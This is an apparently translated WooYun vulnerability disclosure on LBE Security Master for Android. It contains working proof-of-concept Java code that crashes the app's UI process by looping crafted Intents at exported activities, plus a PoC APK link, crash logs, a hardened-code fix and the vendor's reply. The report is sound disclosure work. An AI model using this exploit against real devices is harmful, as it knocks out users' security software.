Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0105985

Title: Multiple flaws allow LBE Security to be crashed and forced to exit regardless of active defense

Vendor: lbesec.com

Author: Nicky

Submitted: 2015-04-05 15:22

Fixed: 2015-07-07 15:52

Published: 2015-07-07 15:52

Vulnerability type: design error / logic flaw

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-05: Details sent to the vendor, awaiting the vendor's handling
2015-04-08: Vendor confirmed; details disclosed to the vendor only
2015-04-11: Details opened to third-party security partners
2015-06-02: Details opened to core white hats and experts in the relevant field
2015-06-12: Details opened to regular white hats
2015-06-22: Details opened to intern white hats
2015-07-07: Details opened to the public

Brief description:

LBE Security Master has multiple flaws that let a malicious app terminate its protection

Details:

For a security application, its own security matters a great deal. Testing shows that the latest Android version of LBE exposes several local components through which, even with active defense enabled, LBE Security Master can be crashed indefinitely. (During testing LBE was seen to run several processes, and it restarts itself some time after a crash, but a simple loop is enough, since crashing is much faster than restarting.)
Because this is a vulnerability, active defense is irrelevant. The affected components are:
com.lbe.security.ui.phone2.PhoneMainActivity
com.lbe.security.ui.notificationmanager.NotificationManagerActivity
com.lbe.security.ui.tips.TipsWebActivity
com.lbe.security.ui.privacy.HipsMainActivity
com.lbe.security.ui.home.NewHomeActivity
com.lbe.security.ui.market.category.CategoryDetailsListActivity
com.lbe.security.ui.upgrade.UpdateManagerActivity
com.lbe.security.ui.optimize.WakePathActivity
Proof-of-concept code: MainActivity.java

package com.example.myapp;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import java.io.Serializable;

public class MyActivity extends Activity {
    /**
     * Called when the activity is first created.
     */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        // Send the target Activity an explicit Intent 20 times. The extra is a
        // Serializable whose class exists only in this APK, so the receiving
        // process cannot resolve it when it unparcels the Bundle.
        int n = 20;
        while (n > 0) {
            Intent intent = new Intent();
            intent.setComponent(new ComponentName("com.lbe.security",
                    "com.lbe.security.ui.optimize.WakePathActivity"));
            intent.putExtra("this_is_a_random_serializable_extra_for_test_general_reject_server",
                    new SerializableObject());
            startActivity(intent);
            n--;
        }
    }

    // Marker class: Serializable, but defined only inside this app.
    static class SerializableObject implements Serializable {
        static final long serialVersionUID = 42L;

        SerializableObject() {
            super();
        }
    }
}


A proof-of-concept APK is provided; after installing and opening it, LBE crashes repeatedly:
Link: http://pan.baidu.com/s/1bHVeI  Password: gam5

Proof:

logcat of the relevant crash:

java.lang.RuntimeException: Unable to start activity ComponentInfo{com.lbe.security/com.lbe.security.ui.optimize.WakePathActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$SerializableObject)
W at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2371)
W at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2423)
W at android.app.ActivityThread.access$800(ActivityThread.java:155)
W at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1340)
W at android.os.Handler.dispatchMessage(Handler.java:110)
W at android.os.Looper.loop(Looper.java:193)
W at android.app.ActivityThread.main(ActivityThread.java:5332)
W at java.lang.reflect.Method.invokeNative(Native Method)
W at java.lang.reflect.Method.invoke(Method.java:515)
W at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:829)
W at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:645)
W at dalvik.system.NativeStart.main(Native Method)
W Caused by: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$SerializableObject)
W at android.os.Parcel.readSerializable(Parcel.java:2219)
W at android.os.Parcel.readValue(Parcel.java:2064)
W at android.os.Parcel.readArrayMapInternal(Parcel.java:2314)
W at android.os.Bundle.unparcel(Bundle.java:249)
W at android.os.Bundle.getString(Bundle.java:1118)
W at android.content.Intent.getStringExtra(Intent.java:4961)
W at com.lbe.security.ui.optimize.WakePathActivity.onCreate(WakePathActivity.java:86)
W at android.app.Activity.performCreate(Activity.java:5371)
W at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1106)
W at com.lbe.client.zz.ba.callActivityOnCreate(InstrumentationDelegate.java:76)
W at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2335)
W ... 11 more
W Caused by: java.lang.ClassNotFoundException: com.example.myapp.MyActivity$SerializableObject
W at java.lang.Class.classForName(Native Method)
W at java.lang.Class.forName(Class.java:251)
W at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2266)
W at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1644)
W at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:658)
W at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1785)
W at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:762)
W at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1986)
W at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1943)
W at android.os.Parcel.readSerializable(Parcel.java:2213)
W ... 21 more
W Caused by: java.lang.NoClassDefFoundError: com/example/myapp/MyActivity$SerializableObject
W ... 31 more
W Caused by: java.lang.ClassNotFoundException: Didn't find class "com.example.myapp.MyActivity$SerializableObject" on path: DexPathList[[zip file "/data/app/com.lbe.security-1.apk"],nativeLibraryDirectories=[/data/app-lib/com.lbe.security-1, /vendor/lib, /system/lib]]
W at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
W at java.lang.ClassLoader.loadClass(ClassLoader.java:497)
W at java.lang.ClassLoader.loadClass(ClassLoader.java:457)
W ... 31 more
dalvikvm W threadid=1: calling UncaughtExceptionHandler
I +++ calling Ljava/lang/ThreadGroup;.uncaughtException
AndroidRuntime E FATAL EXCEPTION: main
E Process: com.lbe.security, PID: 7455
E java.lang.RuntimeException: Unable to start activity ComponentInfo{com.lbe.security/com.lbe.security.ui.optimize.WakePathActivity}: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$SerializableObject)
E at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2371)
E at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2423)
E at android.app.ActivityThread.access$800(ActivityThread.java:155)
E at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1340)
E at android.os.Handler.dispatchMessage(Handler.java:110)
E at android.os.Looper.loop(Looper.java:193)
E at android.app.ActivityThread.main(ActivityThread.java:5332)
E at java.lang.reflect.Method.invokeNative(Native Method)
E at java.lang.reflect.Method.invoke(Method.java:515)
E at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:829)
E at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:645)
E at dalvik.system.NativeStart.main(Native Method)
E Caused by: java.lang.RuntimeException: Parcelable encountered ClassNotFoundException reading a Serializable object (name = com.example.myapp.MyActivity$SerializableObject)
E at android.os.Parcel.readSerializable(Parcel.java:2219)
E at android.os.Parcel.readValue(Parcel.java:2064)
E at android.os.Parcel.readArrayMapInternal(Parcel.java:2314)
E at android.os.Bundle.unparcel(Bundle.java:249)
E at android.os.Bundle.getString(Bundle.java:1118)
E at android.content.Intent.getStringExtra(Intent.java:4961)
E at com.lbe.security.ui.optimize.WakePathActivity.onCreate(WakePathActivity.java:86)
E at android.app.Activity.performCreate(Activity.java:5371)
E at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1106)
E at com.lbe.client.zz.ba.callActivityOnCreate(InstrumentationDelegate.java:76)
E at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2335)
E ... 11 more
E Caused by: java.lang.ClassNotFoundException: com.example.myapp.MyActivity$SerializableObject
E at java.lang.Class.classForName(Native Method)
E at java.lang.Class.forName(Class.java:251)
E at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2266)
E at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1644)
E at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:658)
E at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1785)
E at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:762)
E at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1986)
E at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1943)
E at android.os.Parcel.readSerializable(Parcel.java:2213)
E ... 21 more
E Caused by: java.lang.NoClassDefFoundError: com/example/myapp/MyActivity$SerializableObject
E ... 31 more
E Caused by: java.lang.ClassNotFoundException: Didn't find class "com.example.myapp.MyActivity$SerializableObject" on path: DexPathList[[zip file "/data/app/com.lbe.security-1.apk"],nativeLibraryDirectories=[/data/app-lib/com.lbe.security-1, /vendor/lib, /system/lib]]
E at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
E at java.lang.ClassLoader.loadClass(ClassLoader.java:497)
E at java.lang.ClassLoader.loadClass(ClassLoader.java:457)
E ... 31 more
dalvikvm D threadid=10: exiting
D threadid=10: bye!
Process I Sending signal. PID: 7455 SIG: 9
Process 7455 ended


[Screenshots: S50405-115137.jpg, S50405-115207.jpg]

Suggested fix:

Strictly validate all received input, checking for abnormal conditions such as null pointers, malformed data and forced type conversions.
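As an added example (not LBE's code and not part of the original report), here is the pattern that crashed WakePathActivity, reading a String extra in onCreate, written with the input check the fix calls for. The package, class and extra name are placeholders chosen for this example.

```java
// Added example, not LBE's code: the pattern that crashed WakePathActivity
// (Intent.getStringExtra() in onCreate) with the input check the fix calls for.
// Package, class and extra names are placeholders chosen for this example.
package com.example.hardened;

import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

public class HardenedWakePathActivity extends Activity {
    private static final String TAG = "HardenedWakePath";
    private static final String EXTRA_PATH = "path"; // placeholder extra name

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        String path = readStringExtra(getIntent(), EXTRA_PATH);
        if (path == null || path.isEmpty()) {
            // The Intent could not be read or carries no usable value: bail out
            // cleanly instead of letting the exception kill the whole process.
            Log.w(TAG, "Rejecting Intent with unreadable or missing extras");
            finish();
            return;
        }
        // ... normal handling of the validated value ...
    }

    /**
     * Reads a String extra defensively. The first access to any extra unparcels
     * the whole Bundle; if a caller attached a Serializable (or Parcelable) whose
     * class exists only in the caller's APK, that unparcel throws a RuntimeException
     * wrapping ClassNotFoundException, exactly as in the logcat above. A wrong-typed
     * value simply yields null from getStringExtra(). Both cases return null here.
     */
    static String readStringExtra(Intent intent, String key) {
        if (intent == null || key == null) {
            return null;
        }
        try {
            return intent.getStringExtra(key);
        } catch (RuntimeException e) {
            // Covers BadParcelableException and the ClassNotFoundException wrapper.
            Log.w(TAG, "Unreadable extras in Intent from " + intent.getPackage(), e);
            return null;
        }
    }
}
```

Where an Activity does not need to be reachable from other apps, declaring it with android:exported="false" in the manifest removes this attack surface altogether; the try/catch above is the defense for components that must stay exported.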

Copyright notice: please credit Nicky@乌云 when reposting


Responses

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-04-08 15:51

Vendor reply:

Thanks to Nicky for the research and the submission. LBE Security Master currently runs as two processes; the active defense service and the UI are not in the same process. Nicky's method can indeed crash LBE's UI process, but active defense does not stop working at that point and continues to protect the user normally. Even so, a design flaw like this should not appear in a security product; we apologize for it and will fix it right away in the next version. Thanks again to Nicky for the hard work!

Latest status:

None yet